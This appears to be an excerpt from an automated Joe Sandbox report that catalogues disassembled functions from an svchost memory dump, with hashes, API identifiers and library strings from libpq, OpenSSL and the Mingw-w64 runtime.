                                                                                            • Instruction ID: 789a603f564db672fa6f341e4903ee9751b3dc21a6bd9ca21f49848c12b3f101
                                                                                            • Opcode Fuzzy Hash: 470f3b171a377214d98a476e199219cf95402c31d2bb5ef18a45091ad314cac6
                                                                                            • Instruction Fuzzy Hash: B121B06072965842EE049BE7AC1035BDF96BB86BCCF84547ACD1817340DB3ED546C340
                                                                                            Function 00007FFDA360341A Relevance: 13.6, APIs: 9, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_set_flags$O_set_retry_reason$O_clear_flagsO_get_retry_reasonR_newR_set_debugR_set_error
                                                                                            • String ID:
                                                                                            • API String ID: 2280207033-0
                                                                                            • Opcode ID: 10c884e75fcfe5a2a25692e56033b3c920e493be710e4c608bc273895a24d886
                                                                                            • Instruction ID: ff63c7ef237f8cc067ff9e7b41840893a5f2948031c75fbf3e272f082b01bab7
                                                                                            • Opcode Fuzzy Hash: 10c884e75fcfe5a2a25692e56033b3c920e493be710e4c608bc273895a24d886
                                                                                            • Instruction Fuzzy Hash: EA114F21F0E01243F926A1A6553627D8A538F8BB80F28A031EC5D6BB97CD2FE643030D
                                                                                            Function 66016910 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • Mingw-w64 runtime failure:, xrefs: 66016948
                                                                                            • Address %p has no image-section, xrefs: 66016980, 66016AD5
                                                                                            • VirtualProtect failed with code 0x%x, xrefs: 66016A9E
                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 66016AC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryVirtual
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                            • API String ID: 1804819252-1534286854
                                                                                            • Opcode ID: d80b61cc859d10f00418dba48bc183b6d0d3a1d9ea1f4be7519bb695494f032f
                                                                                            • Instruction ID: 3180ed475d689572c398daea22f15be179196ef56f300b5d752254db8308fd30
                                                                                            • Opcode Fuzzy Hash: d80b61cc859d10f00418dba48bc183b6d0d3a1d9ea1f4be7519bb695494f032f
                                                                                            • Instruction Fuzzy Hash: 1B41ACB2714B5582EB008B92EC5079ABBA5FB89B98F848539DE4D07354EF3EC654C740
                                                                                            Function 00007FFDA36E8620 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OBJ_nid2sn.LIBCRYPTO-3-X64 ref: 00007FFDA36E86B5
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$J_nid2snlibintl_dgettext
                                                                                            • String ID: could not determine server certificate signature algorithm$could not find digest for NID %s$could not generate peer certificate hash$out of memory
                                                                                            • API String ID: 1616563658-1739726057
                                                                                            • Opcode ID: 7456befcdb49f6cfc16e68dfb7b58b7fb4c2e1dfacd58c0b981bdf03a27fead2
                                                                                            • Instruction ID: 36b4ed74a730ec657a40d2fbd2fbcd278c87ca7a911360b6587f53d23dc84f6b
                                                                                            • Opcode Fuzzy Hash: 7456befcdb49f6cfc16e68dfb7b58b7fb4c2e1dfacd58c0b981bdf03a27fead2
                                                                                            • Instruction Fuzzy Hash: 7C319221B1F74645FA549B21A5356BD2393EF48BC0F6C2431E94E63787EF2EE4089708
                                                                                            Function 00007FFDA36E2980 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select
                                                                                            • API String ID: 577054053-2869021068
                                                                                            • Opcode ID: 9b298d906029ec9bae901bf1c7d5cf59c18c3c0e3a39881f4c9bdde784c764ab
                                                                                            • Instruction ID: ec83ff743eefde37a0f9da72ddb2462bae98209ddda42ee140d9a9cc8a53b905
                                                                                            • Opcode Fuzzy Hash: 9b298d906029ec9bae901bf1c7d5cf59c18c3c0e3a39881f4c9bdde784c764ab
                                                                                            • Instruction Fuzzy Hash: 3931A231B0EA8281F6609B14F4643A97393FB44744F182236DA4D567DADF3EE0498B48
                                                                                            Function 00007FFDA36E2AF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select
                                                                                            • API String ID: 577054053-2869021068
                                                                                            • Opcode ID: a21542403bc37c5dc81cdea3681561941a922bc36d663b50e13076fd009d6bda
                                                                                            • Instruction ID: 556197ef285483c9fefe59f217553478f9543c029d78f6dd41e8d01ea2b7dbaf
                                                                                            • Opcode Fuzzy Hash: a21542403bc37c5dc81cdea3681561941a922bc36d663b50e13076fd009d6bda
                                                                                            • Instruction Fuzzy Hash: 7B319672B0EA8281F6609F14F4503AA73A2FB84754F582236DA5D537D5DF3EE009CB48
                                                                                            Function 00007FFDA36EA90B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyInResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-2526997389
                                                                                            • Opcode ID: 90a3719b308e9b7e15fc5213c2bbbd157c4c6f0ba9d94ab6eed9b297f5b708d1
                                                                                            • Instruction ID: 99ace7eacfe120f1e87fcba41850a3b6ab4996cdbf47a2945b05f94c64fba6f9
                                                                                            • Opcode Fuzzy Hash: 90a3719b308e9b7e15fc5213c2bbbd157c4c6f0ba9d94ab6eed9b297f5b708d1
                                                                                            • Instruction Fuzzy Hash: F621B0A2B1A29642FA50DB11E4617B96363EF407C8F487131DE4E17346CE7EE089D348
                                                                                            Function 00007FFDA36EADF9 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyBothResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-986030531
                                                                                            • Opcode ID: 754273cd4aecad12dba0605fc873723a2fa4bb1b1eb6a4fe308a861c23a4436c
                                                                                            • Instruction ID: e362c12cc2373c6617d7d536e636c276c9fa4d6e4da7d298b1f7160d61576158
                                                                                            • Opcode Fuzzy Hash: 754273cd4aecad12dba0605fc873723a2fa4bb1b1eb6a4fe308a861c23a4436c
                                                                                            • Instruction Fuzzy Hash: 5D1181A2B0B65642FA10DB15E5A07B92363EB407C8F487132EA0E17747CE6FE589D348
                                                                                            Function 00007FFDA36D10D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup$free$mallocmemset
                                                                                            • String ID:
                                                                                            • API String ID: 957745791-3916222277
                                                                                            • Opcode ID: 9dbf3abd0d8cde1d1f407bc76f14bd60e431657779e787709216d862b4f90330
                                                                                            • Instruction ID: 586982cb9e1ca753de104e2f72bab398e939be45a7cd1d239a4fa6f1d7faa45a
                                                                                            • Opcode Fuzzy Hash: 9dbf3abd0d8cde1d1f407bc76f14bd60e431657779e787709216d862b4f90330
                                                                                            • Instruction Fuzzy Hash: 0D119D22B0AB4285FB448B26E86013927A1EF8ABD4F1C5034DA4D177AADF3ED451C344
                                                                                            Function 00007FFDA361E440 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_test_flags$O_get_retry_reasonR_peek_error
                                                                                            • String ID:
                                                                                            • API String ID: 265086535-0
                                                                                            • Opcode ID: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                            • Instruction ID: ff02a006d90b706dbb777c49468d0371963b82930af9f21504af7d7736bc73e1
                                                                                            • Opcode Fuzzy Hash: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                            • Instruction Fuzzy Hash: 00916431F1E14282FBA4C616A16063D6392EF54B84F5C2431EA5EE77CBDE1EF8918709
                                                                                            Function 660145D0 Relevance: 12.2, APIs: 8, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d046c1c88af8d9e5ba20d86e38cde6b35e4ef66c6f08dbd0028acdc3ba97a755
                                                                                            • Instruction ID: 6c8db76bd2f623d1bcee4d155f9c80275816e542e977fac6b8bbd9d94b7011ba
                                                                                            • Opcode Fuzzy Hash: d046c1c88af8d9e5ba20d86e38cde6b35e4ef66c6f08dbd0028acdc3ba97a755
                                                                                            • Instruction Fuzzy Hash: D541FFBAA1C258AAE712CBD9845430DFFA0E75639DF825232DE49073B0C3B99D85C342
                                                                                            Function 00007FFDA36E7C30 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 79stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • host name must be specified for a verified SSL connection, xrefs: 00007FFDA36E7D47
                                                                                            • server certificate for "%s" does not match host name "%s", xrefs: 00007FFDA36E7D0D
                                                                                            • server certificate for "%s" (and %d other names) does not match host name "%s", xrefs: 00007FFDA36E7CB9
                                                                                            • verify-full, xrefs: 00007FFDA36E7C5A
                                                                                            • could not get server's host name from server certificate, xrefs: 00007FFDA36E7D1E
                                                                                            • server certificate for "%s" (and %d other name) does not match host name "%s", xrefs: 00007FFDA36E7CC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrcmp
                                                                                            • String ID: could not get server's host name from server certificate$host name must be specified for a verified SSL connection$server certificate for "%s" (and %d other name) does not match host name "%s"$server certificate for "%s" (and %d other names) does not match host name "%s"$server certificate for "%s" does not match host name "%s"$verify-full
                                                                                            • API String ID: 716601943-901380075
                                                                                            • Opcode ID: 918ac9fc1edbc93873064dd82ede4a1d745ab88758a7eca3a772d1e55788ede2
                                                                                            • Instruction ID: b766c9f84849096947d27d825f7ebc4bbb279f6bed765248feb8cfebae9c580b
                                                                                            • Opcode Fuzzy Hash: 918ac9fc1edbc93873064dd82ede4a1d745ab88758a7eca3a772d1e55788ede2
                                                                                            • Instruction Fuzzy Hash: 4131A562B0EB8281FA009B54F4601F96353FB81B90F582032DE4C577A6EF6EE54AC708
                                                                                            Function 00007FFDA36D1640 Relevance: 11.3, APIs: 9, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 40bd6e3ffdfc467a47020ff6a39197a30c6ad2303263d1b40b6ec10154ede92b
                                                                                            • Instruction ID: 25eb82fa1aed4a7da0b663f1c47c167281676b75f642cfc2a578c837e9e3e13f
                                                                                            • Opcode Fuzzy Hash: 40bd6e3ffdfc467a47020ff6a39197a30c6ad2303263d1b40b6ec10154ede92b
                                                                                            • Instruction Fuzzy Hash: 0001E926B16B86C2FB049FAAE8641392322FB88F55B0C1471CD0E5A335CE3DD889C344
                                                                                            Function 00007FFDA36F4CF0 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 466COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: /%u
                                                                                            • API String ID: 2918714741-80514459
                                                                                            • Opcode ID: 0ba1e89c34fc0a67c9f69d9ebe87c96b48d6db8db5620828719671632995fa63
                                                                                            • Instruction ID: a10f1ae769087049362044155f94c16daeb5f218029436ff407dc1b92f05c464
                                                                                            • Opcode Fuzzy Hash: 0ba1e89c34fc0a67c9f69d9ebe87c96b48d6db8db5620828719671632995fa63
                                                                                            • Instruction Fuzzy Hash: 7D023522F1F2928AF7659A24946177D37E2BB41784F0C6236CE4E63B86CE7EDC448744
                                                                                            Function 00007FFDA36F0D70 Relevance: 10.7, APIs: 7, Instructions: 240COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000001,?,00000000,-00000004,00000001,00000000,00000000,00007FFDA36ED09A), ref: 00007FFDA36F0DD5
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0E95
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0ED0
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0F3D
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0F53
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0FCE
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F1116
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: bsearch$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4280696285-0
                                                                                            • Opcode ID: 84dd3428b0e4b449e53855de4397a7857324600eb58f57ac88812422c024c5c8
                                                                                            • Instruction ID: 25b96b9f49d65c262ec8f93c0a9336f89ca38ef261e9ecd0cf3d2c9dd361af35
                                                                                            • Opcode Fuzzy Hash: 84dd3428b0e4b449e53855de4397a7857324600eb58f57ac88812422c024c5c8
                                                                                            • Instruction Fuzzy Hash: 66A18F72B0B68686FB208F15E4603A97BA2FB46B88F485035CE4D57796DF3EE445C704
                                                                                            Function 00007FFDA3681420 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_ctrl$R_newR_set_debugmemcpy
                                                                                            • String ID: dtls1_retransmit_message$ssl\statem\statem_dtls.c
                                                                                            • API String ID: 4082158838-3994044773
                                                                                            • Opcode ID: c9f9dc1b691a6b18460340668137af319db6df49a5d2aa727dd1b189ac01c4a4
                                                                                            • Instruction ID: d2113900aa2198d45010acdb1d952407f6cdfc9dad9776576496744ff7c95566
                                                                                            • Opcode Fuzzy Hash: c9f9dc1b691a6b18460340668137af319db6df49a5d2aa727dd1b189ac01c4a4
                                                                                            • Instruction Fuzzy Hash: C151993220AB80C6E760DF22E890AE933A5FB88B88F485536EF8C57756DF39D541C704
                                                                                            Function 00007FFDA36D5630 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D5656
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D57D6
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA942
                                                                                              • Part of subcall function 00007FFDA36DA920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA36DA956
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA965
                                                                                              • Part of subcall function 00007FFDA36DA920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA983
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
